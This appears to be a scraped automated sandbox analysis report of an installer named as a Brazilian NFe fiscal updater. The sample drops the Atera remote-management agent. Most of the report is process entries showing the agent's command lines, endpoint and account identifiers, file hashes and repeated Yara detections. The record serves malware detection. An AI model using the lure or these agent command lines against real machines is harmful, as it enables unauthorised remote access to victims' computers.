00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EAEB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2368827781.000001C2EAC40000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EAE2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2371335324.000001C2EB000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EAE1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2373005329.000001C2EBD10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EADE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2352910675.000001C2805B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	40
Start time:	10:13:12
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b7913a8a-f9c6-44d6-b153-cbae5eab311c" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000Of2eLIAR
Imagebase:	0x1f14a0b0000
File size:	178'728 bytes
MD5 hash:	83FD950ED584099A4125EFBA77E26BAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2513427313.000001F14A4A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2508147012.000001F14A301000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2516150200.000001F14ADE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2549890793.000001F1633B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2516150200.000001F14AC61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2548326525.000001F16334E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2508147012.000001F14A2FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2516150200.000001F14AD99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2552937808.000001F163497000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2516150200.000001F14ADE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2508147012.000001F14A2C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2555247568.000001F163524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000028.00000002.2547834924.000001F163320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	42
Start time:	10:13:13
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Imagebase:	0x7ff68d1e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000003.2392637897.000001F751BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2455544706.000001F751A70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2455730867.000001F751B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2455544706.000001F751A94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2455544706.000001F751A7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Atualizador_Fiscal_NFe_37882912.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

57a75b.rbf (copy)

57a75c.rbf (copy)

57a75d.rbf (copy)

57a75e.rbf (copy)

57a75f.rbf (copy)

57a760.rbf (copy)

57a761.rbf (copy)

C:\Config.Msi\57a755.rbs

C:\Config.Msi\57a75a.rbs

C:\Config.Msi\57a762.rbs

C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

Windows Analysis Report
Atualizador_Fiscal_NFe_37882912.msi

Target ID:	45
Start time:	10:13:16
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f40b3a64-d934-4445-96c6-2f766d5210eb" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000Of2eLIAR
Imagebase:	0x19f9b460000
File size:	57'896 bytes
MD5 hash:	E9794F785780945D2DDE78520B9BB59F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2790630051.0000019F9B825000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2792340884.0000019F9BDD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2785759950.0000019F9B630000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2785759950.0000019F9B664000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2794634831.0000019F9BFDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2794634831.0000019F9BFC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2784817989.0000019F9B610000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2785759950.0000019F9B702000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2791096428.0000019F9B880000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2794634831.0000019F9C036000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2794634831.0000019F9BEC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2794634831.0000019F9C147000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2791521532.0000019F9BDA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2785759950.0000019F9B69B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2785759950.0000019F9B652000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
Has exited:	true

Target ID:	47
Start time:	10:13:18
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
Imagebase:	0x28a19000000
File size:	57'896 bytes
MD5 hash:	E9794F785780945D2DDE78520B9BB59F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2450784251.0000028A191AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2453247953.0000028A199A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2450784251.0000028A19178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2450784251.0000028A19170000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2453247953.0000028A19921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2450784251.0000028A1918F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2450784251.0000028A191F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2450684383.0000028A19130000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	49
Start time:	10:13:21
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "7e966fca-5db5-4899-b235-235f60debc02" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000Of2eLIAR
Imagebase:	0x21f24c40000
File size:	33'320 bytes
MD5 hash:	DB1DB66EBD9B15B7DCD55374EA56EE5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2959967740.0000021F24FE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.3208734070.0000021F3DE16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2962491449.0000021F257E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2947253751.0000021F24E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2947253751.0000021F24E6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2947253751.0000021F24DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2947253751.0000021F24E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2960467176.0000021F25452000.00000002.00000001.01000000.0000003E.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2947253751.0000021F24DE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2941515088.0000003732901000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.3208734070.0000021F3DDF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2962491449.0000021F25671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
Has exited:	false

Target ID:	51
Start time:	10:13:22
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f80e7fd7-093a-49ee-afe3-91d4df20447b" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000Of2eLIAR
Imagebase:	0x256f0000000
File size:	398'384 bytes
MD5 hash:	5E3252E0248B484E76FCDBF8B42A645D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2684946960.00000256F0270000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2684946960.00000256F02AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2684509702.00000256F00F0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.000002568056B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.0000025680291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256806B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2684946960.00000256F0279000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256806F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2691494022.00000256F1230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.0000025680001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2761043013.00007FFDF11B0000.00000004.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2695822328.00000256F20C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256806F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.000002568048A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2684946960.00000256F030C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2695950550.00000256F20D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256806FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256806C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2695271047.00000256F1EB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.0000025680426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2688813637.00000256F0450000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.0000025680287000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2696035678.00000256F20DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2695385243.00000256F20B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	54
Start time:	10:13:24
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "31ce45eb-a81e-4a65-8c03-ab37bcf781fe" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000Of2eLIAR
Imagebase:	0x11cb23f0000
File size:	57'384 bytes
MD5 hash:	0F33A7ACB33960D1306BA418405D8264
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.3071172900.0000011CCB8E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2950479205.0000011CB267B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.3071172900.0000011CCB994000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2950479205.0000011CB2660000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB3363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB341B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2950479205.0000011CB2748000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2950479205.0000011CB2668000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB337A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB3399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000000.2502915030.0000011CB23F2000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.3061122675.0000011CCB680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2941530850.000000127993F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB33C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.3071172900.0000011CCB95B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB3460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.3065551701.0000011CCB6F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB3357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2948560613.0000011CB25D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2950479205.0000011CB26E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000002.2950479205.0000011CB269D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA 